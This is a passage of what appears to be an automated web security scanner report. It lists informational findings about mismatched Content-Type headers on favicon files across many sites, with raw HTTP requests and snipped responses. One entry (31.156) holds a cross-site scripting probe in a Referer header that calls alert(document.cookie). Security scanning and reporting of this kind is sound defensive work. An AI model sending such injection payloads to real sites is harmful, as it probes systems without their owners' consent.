User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.idg.com.au
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
X-Backend: www.idg.com.au
Content-Length: 45
Date: Tue, 03 May 2011 10:52:07 GMT
X-Varnish: 497346814
Age: 0
Via: 1.1 varnish
Connection: keep-alive

The requested file favicon.ico was not found.

31.125. http://www.ihiremanufacturing.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ihiremanufacturing.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.126. http://www.ihireretail.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ihireretail.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.127. http://www.ihop.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ihop.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.128. http://www.ihousenet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ihousenet.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ihousenet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:16:00 GMT
Server: Apache/2.2.4 (Fedora)
Vary: Host
Last-Modified: Sat, 22 Dec 2007 02:07:51 GMT
ETag: "1bb1332-47e-76560bc0"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

31.129. http://www.inyork.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.inyork.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inyork.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 03 May 2011 10:17:29 GMT
Content-Length: 15
Connection: close

File not found.

31.130. http://www.ionchannels.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ionchannels.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ionchannels.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:41:12 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Sat, 02 Jun 2007 18:44:27 GMT
ETag: "604867a-e36-431f0b8ab78c0"
Accept-Ranges: bytes
Content-Length: 3638
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@...........................~~~.....<<<.....ZZZ..... .lll.................000.GGG.........PPP.............eee.................777.BBB.....UU
...[SNIP]...

31.131. http://www.ipipeline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.ipipeline.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ipipeline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.132. http://www.juicing-for-health.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.juicing-for-health.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=iso-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.juicing-for-health.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:41:40 GMT
Server: Apache
Last-Modified: Sat, 30 Oct 2010 16:23:02 GMT
ETag: "1c1dba4-37e-493d7fd31e580"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=iso-8859-1

..............h.......(....... .................................................................................................uz..&.....!.KK..................................Tc.P........4:..........
...[SNIP]...

31.133. http://www.kencove.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.kencove.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kencove.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:38 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 04 Aug 2009 11:29:44 GMT
ETag: "57d978f-e36-4704f34003a00"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: text/plain

..............h...&... ..............(....... ...........@............................~T.....z<...]!..............i<......S#......gA...j..........tV......V8..R..........wG....m..vB..............P%...
...[SNIP]...

31.134. http://www.khsaa.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.khsaa.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.khsaa.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:53:06 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 30 Jan 2010 19:10:39 GMT
ETag: "20d0022-37e-81f629c0"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

31.135. http://www.kikkomanusa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.kikkomanusa.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kikkomanusa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:49:05 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Wed, 04 Nov 2009 21:52:14 GMT
ETag: "2b2802c-47e-9fa27f80"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ................................................................`.......................................................................`..........................
...[SNIP]...

31.136. http://www.kinderthemes.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.kinderthemes.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kinderthemes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:36:37 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html; charset=iso-8859-1
Age: 0
Proxy-Connection: close
Server: YTS/1.19.8

<h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found

31.137. http://www.kjct8.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.kjct8.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kjct8.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.138. http://www.knife-depot.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.knife-depot.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.knife-depot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:32:04 GMT
Server: Apache
Last-Modified: Wed, 22 Dec 2010 20:52:20 GMT
ETag: "4390157-37e-49805ede04900"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain

..............h.......(....... ...............................fdb.........FFE>>>>>>>>>>>>>>>\\[............|x............MMMSSS>>>>>>>>>YYY...............HHH............LLL...ffe>>>UUU...............
...[SNIP]...

31.139. http://www.kuryakyn.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.kuryakyn.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.140. http://www.laptopical.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.laptopical.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.laptopical.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:24 GMT
Server: Apache/2.2.15 (EL)
Last-Modified: Tue, 03 Feb 2009 12:18:12 GMT
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...........................................%@..%...%...%...%...%...%...%@..........................%...%...%...(.../...7...<...:...0...%...%...%...............%...
...[SNIP]...

31.141. http://www.lasalle.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.lasalle.edu
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lasalle.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:33:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 03 Aug 2009 20:22:14 GMT
ETag: "120353-13e-4704286872980"
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/plain

..............(.......(....... ........................................ad..........t...I3...........x................{2........w.....H...@..GM..M...t...l.p.............Uh......".....Z.US...f..fb...
...[SNIP]...

31.142. http://www.lasvegasdirect.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.lasvegasdirect.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lasvegasdirect.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:08 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 22 Oct 2005 18:49:17 GMT
ETag: "112cd31-57e-403bc3f440540"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain

..............h.......(....... ...........@...................................................................................0""....."...D...U...w........................"...D...U...w................
...[SNIP]...

31.143. http://www.lattc.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.lattc.edu
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.lattc.edu
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 20:21:32 GMT
Server: Oracle HTTP Server Powered by Apache/1.3.19 (Win32) PHP/5.2.8 mod_ssl/2.8.1 OpenSSL/0.9.5a mod_fastcgi/2.2.10 mod_oprocmgr/1.0 mod_perl/1.25
Last-Modified: Tue, 23 Aug 2005 01:26:06 GMT
ETag: "0-e36-430a7b2e"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: text/plain

..............h...&... ..............(....... ...........@...........................ve..GGG.....+.......nno.""".........ZZZ..~..................777.............{{{.---.....................???.OOO.bb
...[SNIP]...

31.144. http://www.leeprecision.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.leeprecision.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.leeprecision.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:44 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Wed, 21 Jan 2009 06:35:51 GMT
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: text/plain

..............h...&... ..............(....... ...........@...........................??..QQ]...........}.``..==......ll..>>......<<......]]..""..::<.WW..<<......NN+.;;l.11..PP..""..--..........$$k...
...[SNIP]...

31.145. http://www.lesboteensblog.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.lesboteensblog.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=cp1251

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lesboteensblog.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.9.7
Date: Tue, 03 May 2011 11:03:21 GMT
Content-Type: text/plain; charset=cp1251
Connection: keep-alive
Last-Modified: Mon, 07 Jun 2010 14:26:57 GMT
ETag: "3468749-2036-48871770f0e40"
Accept-Ranges: bytes
Content-Length: 8246

......00..........&...........h.......(...0...`...............................2G\7La;Pf;Pf6Kb8Le9Mf8Mg>Uq=Vs=XvA_}He.Ea.Ga.B[|?XxBY{6Lp7Jp:Mu3En)8c%/Z.)N.*F.(<.'8.%3.%7.$6. 3..6..-..)..%..%."5#-J(7]4@
...[SNIP]...

31.146. http://www.livingontheedge.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.livingontheedge.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livingontheedge.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:29 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 11 Mar 2009 18:34:08 GMT
ETag: "1b2ab3d-37e-1cf14800"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ..................................~..\dc_gfdomkvtr||x................................U]\\dcaljhsqozxv.~.............................emm[cbaihepnlwur}{z.................
...[SNIP]...

31.147. http://www.localhistories.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.localhistories.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.localhistories.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:22:45 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html; charset=iso-8859-1
Age: 0
Proxy-Connection: close
Server: YTS/1.19.8

<h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found

31.148. http://www.luggagepros.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.luggagepros.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.luggagepros.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:29:13 GMT
Server: Apache
Last-Modified: Mon, 18 Oct 2010 17:59:10 GMT
ETag: "1af59-e36-492e7eeeff4c9"
Accept-Ranges: bytes
Content-Length: 3638
Cache-Control: max-age=31536000
Expires: Wed, 02 May 2012 11:29:13 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

..............h...&... ..............(....... ...........@............................YY..............**..vv......;;..............IK..............IG......IG.............................
..........H
...[SNIP]...

31.149. http://www.lumens.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.lumens.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.150. http://www.lyricsfire.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.lyricsfire.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lyricsfire.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:43:39 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 01 Feb 2011 18:32:32 GMT
Accept-Ranges: bytes
Content-Length: 2550
Cache-Control: max-age=0
Expires: Tue, 03 May 2011 10:43:39 GMT
Connection: close
Content-Type: text/plain

..............h...&......... .h.......(....... ...................................4/..B=..OK..]Y..jg..xu..............................'"..S.k.i.n.s.\.N.e.w. .l.o.g.o.\.w.o.r.k. .P.L.E.S.K.\.i.c.o.\._.
...[SNIP]...

31.151. http://www.manchester2002-uk.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.manchester2002-uk.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.manchester2002-uk.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:46:53 GMT
Server: Apache/1.3.20 Sun Cobalt (Unix) mod_ssl/2.8.4 OpenSSL/0.9.6b PHP/4.1.2 mod_auth_pam_external/0.1 FrontPage/4.0.4.3 mod_perl/1.25
Last-Modified: Thu, 05 Nov 2009 11:34:11 GMT
ETag: "80099-47e-4af2b833"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

31.152. http://www.manycam.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.manycam.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.manycam.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:17 GMT
Server: Apache
Last-Modified: Thu, 14 Feb 2008 06:40:31 GMT
ETag: "144996f-6846-4461890e615c0"
Accept-Ranges: bytes
Content-Length: 26694
Connection: close
Content-Type: text/plain; charset=UTF-8

......00.............. ......................................h.......00.... ..%...$.. .... ......I........ .. ..VZ........ .h....c..(...0...`...........................................f...3.........
...[SNIP]...

31.153. http://www.marijuanaseedbanks.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.marijuanaseedbanks.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.marijuanaseedbanks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:10:35 GMT
Server: Apache
Last-Modified: Wed, 27 Jun 2007 21:09:29 GMT
ETag: "22801ff-9f6-a961d440"
Accept-Ranges: bytes
Content-Length: 2550
Content-Type: text/plain

..............h...&......... .h.......(....... ...................................4/..B=..OK..]Y..jg..xu..............................'"..S.k.i.n.s.\.N.e.w. .l.o.g.o.\.w.o.r.k. .P.L.E.S.K.\.i.c.o.\._.
...[SNIP]...

31.154. http://www.marinas.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.marinas.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.marinas.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:14:12 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 10 Mar 2010 21:08:27 GMT
ETag: "d4b1103-249-48178b30ee8c0"
Accept-Ranges: bytes
Content-Length: 585
Connection: close
Content-Type: text/plain; charset=UTF-8

GIF89a...........................|..t..".....A.
....."..,..%..6..!..<..:..1..>..D.....<..'..T...'..3 s..p..E..R..i........r..r... 0............|..&8,.....8.....o........$..S..6..a......0:...1..0..C...
...[SNIP]...

31.155. https://www.mavitunasecurity.com/support/checkupdate/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.mavitunasecurity.com
Path:	/support/checkupdate/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /support/checkupdate/ HTTP/1.1
Host: www.mavitunasecurity.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 17:04:39 GMT

0.0.0.0

31.156. http://www.maysville-online.com/app/scripts/ajaxModules/upickemDeal.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.maysville-online.com
Path:	/app/scripts/ajaxModules/upickemDeal.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00&regLink=true&title=&upickemSignup=&limit= HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

31.157. http://www.mbn.com.ua/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mbn.com.ua
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=KOI8-R

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mbn.com.ua
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.158. http://www.mbon.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mbon.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.mbon.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 20:42:36 GMT
Server: Apache/1.3.27 (Win32)
Last-Modified: Thu, 01 Jul 2010 12:56:48 GMT
ETag: "0-1536-4c2c9090"
Accept-Ranges: bytes
Content-Length: 5430
Content-Type: text/plain

...... .... .....&......... .h.......(... ...@..... ...................................................................................................................................................
...[SNIP]...

31.159. http://www.mcc.edu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mcc.edu
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mcc.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:11:35 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Tue, 29 Mar 2005 21:45:28 GMT
ETag: "4c01f-37e-94320e00"
Accept-Ranges: bytes
Content-Length: 894
